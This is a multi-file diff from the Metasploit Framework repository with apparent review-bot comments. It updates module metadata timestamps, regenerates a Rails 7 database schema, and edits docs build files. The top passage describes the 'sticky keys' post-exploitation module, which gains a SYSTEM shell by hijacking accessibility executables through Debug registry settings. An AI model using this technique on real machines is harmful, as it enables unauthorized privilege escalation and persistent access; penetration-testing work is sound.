"description": "This module makes it possible to apply the 'sticky keys' hack to a session with appropriate\n rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP\n login screen or via a UAC confirmation dialog. The module modifies the Debug registry setting\n for certain executables.\n\n The module options allow for this hack to be applied to:\n\n SETHC (sethc.exe is invoked when SHIFT is pressed 5 times),\n UTILMAN (Utilman.exe is invoked by pressing WINDOWS+U),\n OSK (osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard), and\n DISP (DisplaySwitch.exe is invoked by pressing WINDOWS+P).\n\n The hack can be added using the ADD action, and removed with the REMOVE action.\n\n Custom payloads and binaries can be run as part of this exploit, but must be manually uploaded\n to the target prior to running the module. By default, a SYSTEM command prompt is installed\n using the registry method if this module is run without modifying any parameters.",
"description": "This module makes it possible to apply the 'sticky keys' hack to a session with appropriate\n rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP\n login screen or via a UAC confirmation dialog. The module modifies the Debug registry setting\n for certain executables.\n\n The module options allow for this hack to be applied to:\n\n SETHC (sethc.exe is invoked when SHIFT is pressed 5 times),\n UTILMAN (Utilman.exe is invoked by pressing WINDOWS+U),\n OSK (osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard), and\n DISP (DisplaySwitch.exe is invoked by pressing WINDOWS+P).\n\n The hack can be added using the ADD action, and removed with the REMOVE action.\n\n Custom payloads and binaries can be run as part of this exploit, but must be manually uploaded\n to the target prior to running the module. By default, a SYSTEM command prompt is installed\n using the registry method if this module is run without modifying any parameters.",
"references": [
"URL-https://web.archive.org/web/20170201184448/https://social.technet.microsoft.com/Forums/windows/en-US/a3968ec9-5824-4bc2-82a2-a37ea88c273a/sticky-keys-exploit",
"URL-https://blog.carnal0wnage.com/2012/04/privilege-escalation-via-sticky-keys.html"
@@ -220730,7 +223349,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-12-04 17:41:24 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/sticky_keys.rb",
"is_install_path": true,
"ref_name": "windows/manage/sticky_keys",
@@ -220767,7 +223386,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-04-05 11:34:37 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/vmdk_mount.rb",
"is_install_path": true,
"ref_name": "windows/manage/vmdk_mount",
@@ -220849,7 +223468,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/wdigest_caching.rb",
"is_install_path": true,
"ref_name": "windows/manage/wdigest_caching",
@@ -220885,7 +223504,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/manage/webcam.rb",
"is_install_path": true,
"ref_name": "windows/manage/webcam",
@@ -220921,7 +223540,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/recon/computer_browser_discovery.rb",
"is_install_path": true,
"ref_name": "windows/recon/computer_browser_discovery",
@@ -220957,7 +223576,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/recon/outbound_ports.rb",
"is_install_path": true,
"ref_name": "windows/recon/outbound_ports",
@@ -220993,7 +223612,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/wlan/wlan_bss_list.rb",
"is_install_path": true,
"ref_name": "windows/wlan/wlan_bss_list",
@@ -221029,7 +223648,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/wlan/wlan_current_connection.rb",
"is_install_path": true,
"ref_name": "windows/wlan/wlan_current_connection",
@@ -221065,7 +223684,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/wlan/wlan_disconnect.rb",
"is_install_path": true,
"ref_name": "windows/wlan/wlan_disconnect",
@@ -221101,7 +223720,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/wlan/wlan_probe_request.rb",
"is_install_path": true,
"ref_name": "windows/wlan/wlan_probe_request",
@@ -221137,7 +223756,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/wlan/wlan_profile.rb",
"is_install_path": true,
"ref_name": "windows/wlan/wlan_profile",
+115 -116
@@ -10,15 +10,14 @@
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 2019_05_07_120211) do
ActiveRecord::Schema[7.0].define(version: 2019_05_07_120211) do
# These are extensions that must be enabled in order to support this database
enable_extension "plpgsql"
create_table "api_keys", id: :serial, force: :cascade do |t|
t.text "token"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
end
create_table "async_callbacks", id: :serial, force: :cascade do |t|
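Review bot: `ActiveRecord::Schema[7.0].define` is the Rails 7 schema-dump form and will not load under Rails 6.x, so the gem constraints should already require Rails >= 7.0 before this dump is merged. The explicit `precision: nil` on every `datetime` column is the right thing to keep rather than strip: Rails 7 defaults new datetime columns to precision 6, so dropping the annotation would make `db:schema:load` create `timestamp(6)` columns that differ from existing databases built from migrations. The schema version stays at 2019_05_07_120211, which confirms this is a regenerated dump with no accompanying migration; the remaining hunks in this file are the same mechanical `precision: nil` change.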
@@ -27,16 +26,16 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
t.string "listener_uri"
t.string "target_host"
t.string "target_port"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
end
create_table "automatic_exploitation_match_results", id: :serial, force: :cascade do |t|
t.integer "match_id"
t.integer "run_id"
t.string "state", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
t.index ["match_id"], name: "index_automatic_exploitation_match_results_on_match_id"
t.index ["run_id"], name: "index_automatic_exploitation_match_results_on_run_id"
end
@@ -44,8 +43,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
create_table "automatic_exploitation_match_sets", id: :serial, force: :cascade do |t|
t.integer "workspace_id"
t.integer "user_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
t.index ["user_id"], name: "index_automatic_exploitation_match_sets_on_user_id"
t.index ["workspace_id"], name: "index_automatic_exploitation_match_sets_on_workspace_id"
end
@@ -54,8 +53,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
t.integer "module_detail_id"
t.string "state"
t.integer "nexpose_data_vulnerability_definition_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
t.integer "match_set_id"
t.string "matchable_type"
t.integer "matchable_id"
@@ -68,8 +67,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
t.integer "workspace_id"
t.integer "user_id"
t.integer "match_set_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
t.index ["match_set_id"], name: "index_automatic_exploitation_runs_on_match_set_id"
t.index ["user_id"], name: "index_automatic_exploitation_runs_on_user_id"
t.index ["workspace_id"], name: "index_automatic_exploitation_runs_on_workspace_id"
@@ -77,11 +76,11 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
create_table "clients", id: :serial, force: :cascade do |t|
t.integer "host_id"
t.datetime "created_at"
t.datetime "created_at", precision: nil
t.string "ua_string", limit: 1024, null: false
t.string "ua_name", limit: 64
t.string "ua_ver", limit: 32
t.datetime "updated_at"
t.datetime "updated_at", precision: nil
end
create_table "credential_cores_tasks", id: false, force: :cascade do |t|
@@ -96,8 +95,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
create_table "creds", id: :serial, force: :cascade do |t|
t.integer "service_id", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
t.string "user", limit: 2048
t.string "pass", limit: 4096
t.boolean "active", default: true
@@ -110,9 +109,9 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
create_table "events", id: :serial, force: :cascade do |t|
t.integer "workspace_id"
t.integer "host_id"
t.datetime "created_at"
t.datetime "created_at", precision: nil
t.string "name"
t.datetime "updated_at"
t.datetime "updated_at", precision: nil
t.boolean "critical"
t.boolean "seen"
t.string "username"
@@ -123,7 +122,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
t.integer "host_id"
t.integer "service_id"
t.integer "vuln_id"
t.datetime "attempted_at"
t.datetime "attempted_at", precision: nil
t.boolean "exploited"
t.string "fail_reason"
t.string "username"
@@ -141,8 +140,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
t.string "session_uuid", limit: 8
t.string "name", limit: 2048
t.string "payload", limit: 2048
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
end
create_table "host_details", id: :serial, force: :cascade do |t|
@@ -157,7 +156,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
end
create_table "hosts", id: :serial, force: :cascade do |t|
t.datetime "created_at"
t.datetime "created_at", precision: nil
t.inet "address", null: false
t.string "mac"
t.string "comm"
@@ -169,7 +168,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
t.string "os_lang"
t.string "arch"
t.integer "workspace_id", null: false
t.datetime "updated_at"
t.datetime "updated_at", precision: nil
t.text "purpose"
t.string "info", limit: 65536
t.text "comments"
@@ -197,8 +196,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
end
create_table "listeners", id: :serial, force: :cascade do |t|
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
t.integer "workspace_id", default: 1, null: false
t.integer "task_id"
t.boolean "enabled", default: true
@@ -217,8 +216,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
t.string "ltype", limit: 512
t.string "path", limit: 1024
t.text "data"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
t.string "content_type"
t.text "name"
t.text "info"
@@ -227,8 +226,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
end
create_table "macros", id: :serial, force: :cascade do |t|
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
t.text "owner"
t.text "name"
t.text "description"
@@ -243,8 +242,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
t.integer "public_id"
t.integer "realm_id"
t.integer "workspace_id", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
t.integer "logins_count", default: 0
t.index ["origin_type", "origin_id"], name: "index_metasploit_credential_cores_on_origin_type_and_origin_id"
t.index ["private_id"], name: "index_metasploit_credential_cores_on_private_id"
@@ -264,56 +263,56 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
t.integer "service_id", null: false
t.string "access_level"
t.string "status", null: false
t.datetime "last_attempted_at"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "last_attempted_at", precision: nil
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
t.index ["core_id", "service_id"], name: "index_metasploit_credential_logins_on_core_id_and_service_id", unique: true
t.index ["service_id", "core_id"], name: "index_metasploit_credential_logins_on_service_id_and_core_id", unique: true
end
create_table "metasploit_credential_origin_cracked_passwords", id: :serial, force: :cascade do |t|
t.integer "metasploit_credential_core_id", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
t.index ["metasploit_credential_core_id"], name: "originating_credential_cores"
end
create_table "metasploit_credential_origin_imports", id: :serial, force: :cascade do |t|
t.text "filename", null: false
t.integer "task_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
t.index ["task_id"], name: "index_metasploit_credential_origin_imports_on_task_id"
end
create_table "metasploit_credential_origin_manuals", id: :serial, force: :cascade do |t|
t.integer "user_id", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
t.index ["user_id"], name: "index_metasploit_credential_origin_manuals_on_user_id"
end
create_table "metasploit_credential_origin_services", id: :serial, force: :cascade do |t|
t.integer "service_id", null: false
t.text "module_full_name", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
t.index ["service_id", "module_full_name"], name: "unique_metasploit_credential_origin_services", unique: true
end
create_table "metasploit_credential_origin_sessions", id: :serial, force: :cascade do |t|
t.text "post_reference_name", null: false
t.integer "session_id", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
t.index ["session_id", "post_reference_name"], name: "unique_metasploit_credential_origin_sessions", unique: true
end
create_table "metasploit_credential_privates", id: :serial, force: :cascade do |t|
t.string "type", null: false
t.text "data", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
t.string "jtr_format"
t.index "type, decode(md5(data), 'hex'::text)", name: "index_metasploit_credential_privates_on_type_and_data_sshkey", unique: true, where: "((type)::text = 'Metasploit::Credential::SSHKey'::text)"
t.index ["type", "data"], name: "index_metasploit_credential_privates_on_type_and_data", unique: true, where: "(NOT ((type)::text = 'Metasploit::Credential::SSHKey'::text))"
@@ -321,8 +320,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
create_table "metasploit_credential_publics", id: :serial, force: :cascade do |t|
t.string "username", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
t.string "type", null: false
t.index ["username"], name: "index_metasploit_credential_publics_on_username", unique: true
end
@@ -330,8 +329,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
create_table "metasploit_credential_realms", id: :serial, force: :cascade do |t|
t.string "key", null: false
t.string "value", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
t.index ["key", "value"], name: "index_metasploit_credential_realms_on_key_and_value", unique: true
end
@@ -361,7 +360,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
end
create_table "module_details", id: :serial, force: :cascade do |t|
t.datetime "mtime"
t.datetime "mtime", precision: nil
t.text "file"
t.string "mtype"
t.text "refname"
@@ -371,7 +370,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
t.text "description"
t.string "license"
t.boolean "privileged"
t.datetime "disclosure_date"
t.datetime "disclosure_date", precision: nil
t.integer "default_target"
t.text "default_action"
t.string "stance"
@@ -402,7 +401,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
end
create_table "module_runs", id: :serial, force: :cascade do |t|
t.datetime "attempted_at"
t.datetime "attempted_at", precision: nil
t.text "fail_detail"
t.string "fail_reason"
t.text "module_fullname"
@@ -414,8 +413,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
t.string "trackable_type"
t.integer "user_id"
t.string "username"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
t.index ["session_id"], name: "index_module_runs_on_session_id"
t.index ["user_id"], name: "index_module_runs_on_user_id"
end
@@ -428,8 +427,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
end
create_table "nexpose_consoles", id: :serial, force: :cascade do |t|
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
t.boolean "enabled", default: true
t.text "owner"
t.text "address"
@@ -444,12 +443,12 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
end
create_table "notes", id: :serial, force: :cascade do |t|
t.datetime "created_at"
t.datetime "created_at", precision: nil
t.string "ntype", limit: 512
t.integer "workspace_id", default: 1, null: false
t.integer "service_id"
t.integer "host_id"
t.datetime "updated_at"
t.datetime "updated_at", precision: nil
t.boolean "critical"
t.boolean "seen"
t.text "data"
@@ -471,13 +470,13 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
t.string "raw_payload_hash"
t.string "build_status"
t.string "build_opts"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
end
create_table "profiles", id: :serial, force: :cascade do |t|
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
t.boolean "active", default: true
t.text "name"
t.text "owner"
@@ -486,9 +485,9 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
create_table "refs", id: :serial, force: :cascade do |t|
t.integer "ref_id"
t.datetime "created_at"
t.datetime "created_at", precision: nil
t.string "name", limit: 512
t.datetime "updated_at"
t.datetime "updated_at", precision: nil
t.index ["name"], name: "index_refs_on_name"
end
@@ -497,8 +496,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
t.string "created_by"
t.string "path", limit: 1024
t.text "name"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
end
create_table "reports", id: :serial, force: :cascade do |t|
@@ -507,9 +506,9 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
t.string "rtype"
t.string "path", limit: 1024
t.text "options"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "downloaded_at"
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
t.datetime "downloaded_at", precision: nil
t.integer "task_id"
t.string "name", limit: 63
end
@@ -522,12 +521,12 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
create_table "services", id: :serial, force: :cascade do |t|
t.integer "host_id"
t.datetime "created_at"
t.datetime "created_at", precision: nil
t.integer "port", null: false
t.string "proto", limit: 16, null: false
t.string "state"
t.string "name"
t.datetime "updated_at"
t.datetime "updated_at", precision: nil
t.text "info"
t.index ["host_id", "port", "proto"], name: "index_services_on_host_id_and_port_and_proto", unique: true
t.index ["name"], name: "index_services_on_name"
@@ -543,7 +542,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
t.binary "output"
t.string "remote_path"
t.string "local_path"
t.datetime "created_at"
t.datetime "created_at", precision: nil
end
create_table "sessions", id: :serial, force: :cascade do |t|
@@ -555,11 +554,11 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
t.integer "port"
t.string "platform"
t.text "datastore"
t.datetime "opened_at", null: false
t.datetime "closed_at"
t.datetime "opened_at", precision: nil, null: false
t.datetime "closed_at", precision: nil
t.string "close_reason"
t.integer "local_id"
t.datetime "last_seen"
t.datetime "last_seen", precision: nil
t.integer "module_run_id"
t.index ["module_run_id"], name: "index_sessions_on_module_run_id"
end
@@ -571,51 +570,51 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
t.boolean "report_summary", default: false, null: false
t.boolean "report_detail", default: false, null: false
t.boolean "critical", default: false, null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
end
create_table "task_creds", id: :serial, force: :cascade do |t|
t.integer "task_id", null: false
t.integer "cred_id", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
end
create_table "task_hosts", id: :serial, force: :cascade do |t|
t.integer "task_id", null: false
t.integer "host_id", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
end
create_table "task_services", id: :serial, force: :cascade do |t|
t.integer "task_id", null: false
t.integer "service_id", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
end
create_table "task_sessions", id: :serial, force: :cascade do |t|
t.integer "task_id", null: false
t.integer "session_id", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
end
create_table "tasks", id: :serial, force: :cascade do |t|
t.integer "workspace_id", default: 1, null: false
t.string "created_by"
t.string "module"
t.datetime "completed_at"
t.datetime "completed_at", precision: nil
t.string "path", limit: 1024
t.string "info"
t.string "description"
t.integer "progress"
t.text "options"
t.text "error"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
t.text "result"
t.string "module_uuid", limit: 8
t.binary "settings"
@@ -626,8 +625,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
t.string "crypted_password"
t.string "password_salt"
t.string "persistence_token"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
t.string "fullname"
t.string "email"
t.string "phone"
@@ -638,7 +637,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
create_table "vuln_attempts", id: :serial, force: :cascade do |t|
t.integer "vuln_id"
t.datetime "attempted_at"
t.datetime "attempted_at", precision: nil
t.boolean "exploited"
t.string "fail_reason"
t.string "username"
@@ -661,26 +660,26 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
t.string "nx_vuln_id"
t.float "nx_severity"
t.float "nx_pci_severity"
t.datetime "nx_published"
t.datetime "nx_added"
t.datetime "nx_modified"
t.datetime "nx_published", precision: nil
t.datetime "nx_added", precision: nil
t.datetime "nx_modified", precision: nil
t.text "nx_tags"
t.text "nx_vuln_status"
t.text "nx_proof_key"
t.string "src"
t.integer "nx_scan_id"
t.datetime "nx_vulnerable_since"
t.datetime "nx_vulnerable_since", precision: nil
t.string "nx_pci_compliance_status"
end
create_table "vulns", id: :serial, force: :cascade do |t|
t.integer "host_id"
t.integer "service_id"
t.datetime "created_at"
t.datetime "created_at", precision: nil
t.string "name"
t.datetime "updated_at"
t.datetime "updated_at", precision: nil
t.string "info", limit: 65536
t.datetime "exploited_at"
t.datetime "exploited_at", precision: nil
t.integer "vuln_detail_count", default: 0
t.integer "vuln_attempt_count", default: 0
t.integer "origin_id"
@@ -696,8 +695,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
create_table "web_forms", id: :serial, force: :cascade do |t|
t.integer "web_site_id", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
t.text "path"
t.string "method", limit: 1024
t.text "params"
@@ -707,15 +706,15 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
create_table "web_pages", id: :serial, force: :cascade do |t|
t.integer "web_site_id", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
t.text "path"
t.text "query"
t.integer "code", null: false
t.text "cookie"
t.text "auth"
t.text "ctype"
t.datetime "mtime"
t.datetime "mtime", precision: nil
t.text "location"
t.text "headers"
t.binary "body"
@@ -726,8 +725,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
create_table "web_sites", id: :serial, force: :cascade do |t|
t.integer "service_id", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
t.string "vhost", limit: 2048
t.text "comments"
t.text "options"
@@ -738,8 +737,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
create_table "web_vulns", id: :serial, force: :cascade do |t|
t.integer "web_site_id", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
t.text "path", null: false
t.string "method", limit: 1024, null: false
t.text "params"
@@ -773,8 +772,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
t.string "respcode", limit: 16
t.text "resphead"
t.text "response"
t.datetime "created_at"
t.datetime "updated_at"
t.datetime "created_at", precision: nil
t.datetime "updated_at", precision: nil
end
create_table "wmap_targets", id: :serial, force: :cascade do |t|
@@ -783,8 +782,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
t.integer "port"
t.integer "ssl"
t.integer "selected"
t.datetime "created_at"
t.datetime "updated_at"
t.datetime "created_at", precision: nil
t.datetime "updated_at", precision: nil
end
create_table "workspace_members", id: false, force: :cascade do |t|
@@ -794,8 +793,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
create_table "workspaces", id: :serial, force: :cascade do |t|
t.string "name"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "created_at", precision: nil, null: false
t.datetime "updated_at", precision: nil, null: false
t.string "boundary", limit: 4096
t.string "description", limit: 4096
t.integer "owner_id"
+1 -1
@@ -7,4 +7,4 @@ vendor
# These files will be generated by build.rb and do not need to be committed
docs
metasploit-framework.wiki.old
index.md
/index.md
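Review bot: anchoring the pattern as `/index.md` narrows the ignore to the repository root, so an `index.md` in any nested directory other than the already-ignored `docs` tree will now be tracked. That matches the comment that only build.rb output should be ignored, but it is a behaviour change worth a line in the commit message, since the old unanchored `index.md` silently ignored every generated index page wherever it lived.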
+13 -6
@@ -13,6 +13,19 @@ How it works:
Behind the scenes these docs are built and deployed to https://docs.metasploit.com/
### Adding pages
You can modify existing documentation files within `metasploit-framework.wiki/` with an editor of your choice and send a pull request.
To add a new page, modify `navigation.rb`. Full details are found beside the `NAVIGATION_CONFIG` constant.
## Adding links
For linking to other docs the Github markdown syntax `[[link text|relative_path_to_docs]]` is used. Behind the scenes these
links will be verified at build time to ensure there's no 404 links.
Note: It is also possible to use the syntax `[[link text|relative_path_to_docs#section]]` - but this navigation will happen client side, and
there is no validation that these sections exist at build time. It is possible for future edits to a markdown file to break these links.
## Setup
### Developer build
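Review bot: heading levels are inconsistent in this hunk: `### Adding pages` is H3, but the new `## Adding links` directly after it is H2, so the link guidance becomes a sibling of `## Setup` instead of sitting with the page-editing guidance it belongs to; make both `###` (or both `##`). The caveat that `#section` anchors are not validated at build time is the important part and matches the comment on `extract_relative_links` in build.rb, so keep it.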
@@ -42,9 +55,3 @@ bundle exec ruby build.rb --production --serve
```
Now visit http://127.0.0.1:4000/metasploit-framework/
### Contributing Documentation
You can modify existing documentation files within `metasploit-framework.wiki/` with an editor of your choice and send a pull request.
Note that adding a new page will also require modifying `navigation.rb` to appear on the navigation menu.
+3
@@ -0,0 +1,3 @@
# Staging assumes that it is currently deployed to gh-pages; All links are prefixed with /metasploit-framework
baseurl: 'metasploit-framework'
ga_tracking: ''
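Review bot: the comment says links are prefixed with `/metasploit-framework`, but `baseurl` is set without the leading slash. Jekyll's `relative_url` filter (which `{% link %}` output goes through) normalizes a missing slash, so generated links still work, but any layout that interpolates `{{ site.baseurl }}` directly will emit a relative `metasploit-framework/...` path; set `baseurl: '/metasploit-framework'` to match both the comment and Jekyll's documented convention.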
+29
@@ -0,0 +1,29 @@
<style>
#main-content p {
text-align: justify;
}
.language-mermaid .label {
text-transform: inherit;
}
.language-msf .zp {
text-decoration: underline;
}
.language-msf .ze {
color: #960050;
}
.language-msf .zg {
color: #859900;
}
.language-msf .zs {
color: #268bd2;
}
.language-msf .zw {
color: orange;
}
</style>
@@ -0,0 +1,74 @@
require 'rouge'
# Custom highlighting support for Metasploit's prompt
# https://rouge-ruby.github.io/docs/file.LexerDevelopment.html
module Rouge
# Custom tokens specific to Msf, as the inbuilt lexer tokens can't capture
# the detail required for Msf's print_warning/print_good/etc calls.
module Tokens
def self.token(name, shortname, &b)
tok = Token.make_token(name, shortname, &b)
const_set(name, tok)
end
# The 'shortname' is the class used when generating the HTML. It is intentionally
# short to reduce HTML size.
# https://github.com/rouge-ruby/rouge/blob/a4ed658d2778a3e2d3e68873f7221b91149a2ed4/lib/rouge/token.rb#L69
SHORTNAME = 'z'
token :Msf, SHORTNAME do
